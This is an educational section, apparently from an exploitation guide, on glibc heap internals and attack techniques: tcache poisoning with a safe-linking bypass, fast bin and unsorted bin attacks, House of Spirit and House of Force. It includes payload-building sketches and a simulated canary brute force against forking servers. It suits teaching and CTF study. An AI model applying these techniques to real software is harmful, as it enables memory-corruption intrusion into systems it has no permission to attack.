The heap is the dynamic memory region managed by the allocator (malloc/free/realloc). Unlike the stack, it has no fixed layout, making exploitation more complex but also more powerful. The dominant allocator on Linux is ptmalloc2 (glibc), and the techniques in this section target it specifically.

Heap fundamentals

Chunks

Every allocation is wrapped in a chunk — a header plus user data. The header stores the chunk size and status flags.
struct malloc_chunk {
    size_t mchunk_prev_size;  // size of previous chunk if it is free
    size_t mchunk_size;       // size + status flags in lowest 3 bits
    struct malloc_chunk *fd;  // forward pointer (free chunks only)
    struct malloc_chunk *bk;  // backward pointer (free chunks only)
    // large chunks only:
    struct malloc_chunk *fd_nextsize;
    struct malloc_chunk *bk_nextsize;
};
The lowest three bits of mchunk_size are flags:
  • P (bit 0): previous chunk in use
  • M (bit 1): chunk was mmap’d
  • A (bit 2): chunk belongs to a non-main arena
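Because the three flag bits live inside the size word, reading a raw header means masking them off. A minimal Python sketch (not glibc code) of that split:

```python
# Flag bits in the low 3 bits of mchunk_size (values from glibc's malloc.c)
PREV_INUSE     = 0x1  # P: previous chunk in use
IS_MMAPPED     = 0x2  # M: chunk was mmap'd
NON_MAIN_ARENA = 0x4  # A: chunk belongs to a non-main arena

def parse_mchunk_size(raw):
    """Split a raw mchunk_size word into (chunk size, flag bits)."""
    return raw & ~0x7, raw & 0x7

# 0x91 -> a 0x90-byte chunk whose previous neighbour is in use
size, flags = parse_mchunk_size(0x91)
print(hex(size), bool(flags & PREV_INUSE))  # 0x90 True
```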

Bins

When chunks are freed they enter bins — linked lists from which the allocator recycles memory.
Bin                                Size range     Structure
tcache (per-thread, glibc ≥ 2.26)  24–1032 bytes  Singly-linked, 7 entries max per size
Fast bins                          16–176 bytes   Singly-linked LIFO
Unsorted bin                       Any            Doubly-linked, staging area
Small bins                         16–1008 bytes  Doubly-linked FIFO
Large bins                         ≥1024 bytes    Doubly-linked with size ordering
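Note that bin placement is decided by the chunk size, not the requested size: glibc rounds each request up to an aligned chunk size (8-byte size word plus 16-byte alignment on 64-bit). A simplified sketch of that rounding:

```python
# 64-bit constants from glibc's malloc.c
SIZE_SZ = 8            # width of mchunk_size
MALLOC_ALIGNMENT = 16
MINSIZE = 0x20         # smallest possible chunk

def request2size(req):
    """Simplified 64-bit version of glibc's request2size macro."""
    chunk = (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(chunk, MINSIZE)

print(hex(request2size(24)))  # 0x20 -- fits because prev_size of the
                              # next chunk overlaps the user data
print(hex(request2size(25)))  # 0x30
print(hex(request2size(64)))  # 0x50
```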

Arenas

In multi-threaded programs, each thread may have its own arena (a separate heap with its own mutex), reducing contention. The main arena expands with brk; secondary arenas use mmap to create subheaps.

Vulnerability primitives

Use-After-Free (UAF)

A UAF occurs when code continues using a pointer after the referenced chunk has been free’d. If an attacker can cause a new allocation to reuse the freed chunk and control its contents, they can manipulate the object’s fields — including virtual-function pointers.
// Simplified UAF (C sketch)
struct obj { void (*method)(void); };

struct obj *o = malloc(64);
free(o);
// o's chunk is now in the tcache, but o still points at it

char *controlled = malloc(64);         // same size class: returns o's address
memcpy(controlled, attacker_data, 8);  // attacker overwrites o->method
o->method();                           // calls attacker-chosen function

Double-Free

Freeing the same chunk twice corrupts the bin’s free list. In older glibc versions without tcache, this directly corrupts the forward/backward pointers. In modern glibc with tcache, a double-free corrupts the next pointer in the tcache bin.
char *a = malloc(64);
free(a);
free(a);  // undefined behaviour — corrupts tcache or fast bin
Detection: glibc now checks tcache_entry->key to detect double-frees within the same bin.
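The logic of that check can be modelled as follows (a Python toy model of the glibc ≥ 2.29 behaviour, not glibc source): free() stamps each tcache entry with a per-thread key, and a second free of a chunk that still carries the key triggers a scan of the bin.

```python
class TcacheBin:
    """Toy model of the tcache double-free check (glibc >= 2.29 logic)."""
    KEY = object()  # stands in for the per-thread tcache struct pointer

    def __init__(self):
        self.entries = []  # addresses currently in this bin
        self.key_of = {}   # addr -> key stamped when the chunk was freed

    def free(self, addr):
        # glibc: if e->key == tcache, walk the bin looking for this chunk
        if self.key_of.get(addr) is self.KEY and addr in self.entries:
            raise RuntimeError("free(): double free detected in tcache 2")
        self.key_of[addr] = self.KEY  # stamp the key on free
        self.entries.insert(0, addr)  # push onto the singly-linked list

bin_ = TcacheBin()
bin_.free(0x55555555a2a0)      # first free: fine
try:
    bin_.free(0x55555555a2a0)  # second free of the same chunk
except RuntimeError as e:
    print(e)                   # free(): double free detected in tcache 2
```

Bypasses typically overwrite the key field (via UAF) before the second free, so the fast path check no longer matches.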

Heap Overflow

Writing past the end of a heap chunk corrupts the next chunk’s header, allowing an attacker to forge the size field or P/M/A flags — which leads to overlapping allocations or controlled writes.
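As a concrete sketch (sizes hypothetical), a payload for a 0x20-byte victim chunk: 0x18 bytes of user data (the last 8 overlap the neighbour's prev_size) followed by a forged size field for the next chunk.

```python
import struct

p64 = lambda v: struct.pack("<Q", v)  # pack a little-endian 64-bit word

# Victim chunk of size 0x20: 0x18 usable bytes sit before the
# neighbouring chunk's size field.
payload  = b"A" * 0x18   # fills user data and the next chunk's prev_size
payload += p64(0x421)    # forged size for the next chunk (P bit set):
                         # it now claims to span 0x420 bytes

print(len(payload), payload[-8:].hex())
```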

Attack techniques

Tcache poisoning

Overwrite the next pointer of a freed tcache chunk with a target address. The next two malloc() calls of the same size will return:
  1. The poisoned chunk itself
  2. The forged target address — enabling a write-what-where primitive
# Pseudocode for tcache poisoning
a = malloc(0x40)
b = malloc(0x40)
free(b)
free(a)            # tcache list: a -> b

# Overwrite a's next pointer (via overflow or UAF on a)
write(a, p64(target_address ^ (a >> 12)))  # safe-linking: XOR key is the storage address >> 12

malloc(0x40)       # returns a (pops from list)
evil = malloc(0x40)  # returns target_address
write(evil, data)  # arbitrary write
Since glibc 2.32, tcache next pointers are stored XOR-ed with the address of their own storage location shifted right by 12 (safe-linking). A heap address leak is required to compute the correct obfuscated value.
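The obfuscation and its inverse can be sketched like this (mirroring glibc's PROTECT_PTR/REVEAL_PTR macros; all addresses hypothetical):

```python
def protect_ptr(pos, ptr):
    """glibc PROTECT_PTR: `pos` is the address the pointer is stored at."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos, obfuscated):
    """glibc REVEAL_PTR: inverse of protect_ptr."""
    return (pos >> 12) ^ obfuscated

chunk_a = 0x55555555a2a0   # hypothetical leaked heap address of chunk a
target  = 0x7ffff7dd0640   # hypothetical address we want malloc to return

stored = protect_ptr(chunk_a, target)  # value to write into a's next field
assert reveal_ptr(chunk_a, stored) == target
print(hex(stored))
```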

Fast bin corruption

Corrupt the fd pointer of a freed fast bin chunk to point to a fake chunk at a target address. When that fake chunk is allocated, any subsequent write lands at the target. The fake chunk’s size field must fall within the fast bin’s size class and the address must be aligned.

Unsorted bin attack

Overwrite the bk pointer of an unsorted bin chunk. When the allocator processes the bin, it writes a pointer into main_arena to bk->fd — a fixed-value write to an attacker-chosen address. Typically used to overwrite _IO_list_all or a malloc hook.
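Since fd sits at offset 0x10 from the chunk header on 64-bit, aiming that write at a chosen address just means pointing bk 0x10 bytes before it (target address hypothetical):

```python
def unsorted_bin_bk(target):
    """bk value that makes unsorted-bin processing write a main_arena
    pointer to `target`: fd lives at chunk + 0x10 on 64-bit, so bk
    must point 0x10 bytes before the target."""
    return target - 0x10

io_list_all = 0x7ffff7dd2520   # hypothetical libc address from a leak
print(hex(unsorted_bin_bk(io_list_all)))  # 0x7ffff7dd2510
```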

House of Spirit

Free a crafted (fake) chunk to insert it into a bin. Requirements:
  • The fake chunk’s size field matches the target bin class
  • The next fake chunk (at fake + size) carries a plausible size field
Result: the fake chunk’s address is returned by the next malloc() of the matching size.
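A payload satisfying those requirements can be sketched as follows (all sizes hypothetical; the payload would be planted at a known writable address before calling free on it):

```python
import struct

p64 = lambda v: struct.pack("<Q", v)

FAKE_SIZE = 0x40                      # must match a tcache/fast-bin class

fake  = p64(0)                        # fake chunk: prev_size (unused)
fake += p64(FAKE_SIZE | 1)            # size field with P bit set
fake += b"\x00" * (FAKE_SIZE - 0x10)  # fake chunk's user-data area
fake += p64(0)                        # next fake chunk: prev_size
fake += p64(0x40)                     # plausible size for the next chunk

# Plant `fake` at address addr, then free(addr + 0x10):
# the next malloc(0x38) returns addr + 0x10.
print(len(fake))
```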

House of Force

Overwrite the top chunk’s size field with 0xffffffffffffffff so that any request appears to fit. A malloc() of roughly target - top_address - overhead then drags the top chunk to just before the target, and the following allocation returns a pointer into the target region. glibc ≥ 2.29 sanity-checks the top chunk size, killing this technique on modern systems.
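The size arithmetic can be sketched as (addresses hypothetical; 64-bit, ignoring alignment):

```python
def house_of_force_size(top_addr, target):
    """Request size that moves the top chunk so the *next* malloc
    returns `target`: 0x10 covers the evil chunk's header and 0x10 the
    header of the chunk carved at the target. The subtraction wraps
    modulo 2**64, so targets below the heap also work."""
    return (target - top_addr - 0x20) % (1 << 64)

top    = 0x555555559290   # hypothetical current top chunk address
target = 0x5555555a0000   # hypothetical address to hijack

req = house_of_force_size(top, target)
print(hex(req))
# malloc(req) drags top to target - 0x10; the next malloc returns target
```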

Heap debugging workflow

# Install pwndbg or GEF for heap-aware GDB
git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh

# Inside GDB (pwndbg)
heap             # show all chunks in the main arena
bins             # show all bin free lists
tcachebins       # show per-thread tcache
vis_heap_chunks  # visualise chunk memory

# Check protections
checksec

Tools for heap exploitation

Tool       Use
pwndbg     GDB plugin with heap, bins, tcachebins commands
GEF        Alternative GDB plugin with heap chunks / heap bins
heaptrace  Trace malloc/free calls with call sites
pwntools   Automate interaction and payload construction

musl / Alpine notes

The musl mallocng allocator used in Alpine Linux differs significantly from ptmalloc:
  • Allocations live in mmap’d groups organised by size class (stride)
  • Out-of-band metadata with per-group cookies complicates metadata corruption
  • A cycling offset may shift the user-data start by 0x10 bytes on slot reuse — verify with muslheap’s mchunkinfo before tuning offsets
  • Target higher-level objects (e.g., Lua Table->array pointers) rather than allocator metadata
# muslheap GDB plugin
git clone https://github.com/xf1les/muslheap
# In GDB:
source muslheap/muslheap.py
mchunkinfo 0x7ffff7a94e40
When exploiting forking servers, every child inherits the parent’s heap layout and stack canary. A single stable corruption primitive is sufficient — no need to defeat per-execution randomisation.
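One classic consequence (simulated below; the probe function is a stand-in for a real forked child, and the canary value is made up): because every child shares the parent’s canary, it can be brute-forced one byte at a time by observing which overwrites crash the child.

```python
import struct

# Unknown to the "attacker"; low byte 0x00 as in real glibc canaries
SECRET_CANARY = struct.pack("<Q", 0x1234567855667700)

def child_survives(guess):
    """Stand-in for probing one forked child: the child crashes
    (returns False) unless every overwritten canary byte matches."""
    return SECRET_CANARY.startswith(guess)

recovered = b""
for _ in range(8):                 # one byte per position
    for byte in range(256):
        if child_survives(recovered + bytes([byte])):
            recovered += bytes([byte])
            break

print(recovered == SECRET_CANARY)  # True, after at most 8 * 256 probes
```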
